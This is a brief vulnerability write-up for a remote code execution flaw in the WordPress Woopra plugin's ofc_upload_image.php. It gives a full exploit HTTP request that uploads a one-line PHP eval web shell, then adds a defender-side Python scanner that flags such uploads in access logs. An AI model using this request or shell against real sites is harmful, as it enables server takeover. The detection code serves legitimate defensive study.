As usual, the English write-up for showing off: WordPress Woopra Remote Code Execution: http://www.wordpress-secure.org/ ... ote-code-execution/
This vulnerability is ineffective against Woopra 1.4.3.1 and above. Plugin download address: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
Exploit request:

POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
Host: ha.cker.in
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 28

<?php eval($_POST['cmd']); ?>
The uploaded file ends up at http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
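As an added example that is not part of the original post, here is the defender-side check for this issue: a small Python scanner that runs over constructed web-server access-log lines and flags requests to the plugin's bundled ofc_upload_image.php endpoint whose name parameter would create a server-executable file or escape the upload directory. The log format, the sample lines and the extension lists are assumptions made for the example.

```python
# Added example (not from the original post): scan access-log lines for upload
# attempts against the ofc_upload_image.php endpoint shipped in the Woopra plugin's
# php-ofc-library and flag "name" values that would not produce a plain image.
import re
from urllib.parse import urlsplit, parse_qs

# Common log format (assumed): client ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

ENDPOINT = "php-ofc-library/ofc_upload_image.php"
ALLOWED_IMAGE_EXT = {"png", "jpg", "jpeg", "gif"}
# Suffixes a typical PHP handler executes; the list is an assumption for the example.
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}

def classify(line):
    """Return None for lines that do not touch the endpoint, else a finding dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(ENDPOINT):
        return None
    name = parse_qs(parts.query).get("name", [""])[0]  # parse_qs percent-decodes once
    # the final suffix decides how the web server will treat the written file
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ".." in name or "/" in name or "\\" in name:
        verdict = "path-traversal"
    elif ext in EXEC_EXT:
        verdict = "executable-upload"
    elif ext not in ALLOWED_IMAGE_EXT:
        verdict = "non-image-upload"
    else:
        verdict = "image-upload"
    return {"ip": m.group("ip"), "time": m.group("time"), "method": m.group("method"),
            "name": name, "status": int(m.group("status")), "verdict": verdict}

def scan(lines):
    """Return every hit on the endpoint; a responder reviews anything that is not an image."""
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample log lines (not real traffic), mirroring the request shown above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2013:10:01:02 +0800] "GET /wordpress/ HTTP/1.1" 200 4123
203.0.113.5 - - [10/Jun/2013:10:01:09 +0800] "POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1" 200 88
198.51.100.7 - - [10/Jun/2013:10:02:30 +0800] "POST /wordpress/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 90
198.51.100.9 - - [10/Jun/2013:10:03:00 +0800] "POST /wordpress/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=..%2F..%2Fx.txt HTTP/1.1" 403 12
""".splitlines()
```

Running scan(SAMPLE_LOG) yields three findings; a 200 status on an executable-upload hit is the case to treat as a likely compromise and check the tmp-upload-images directory for.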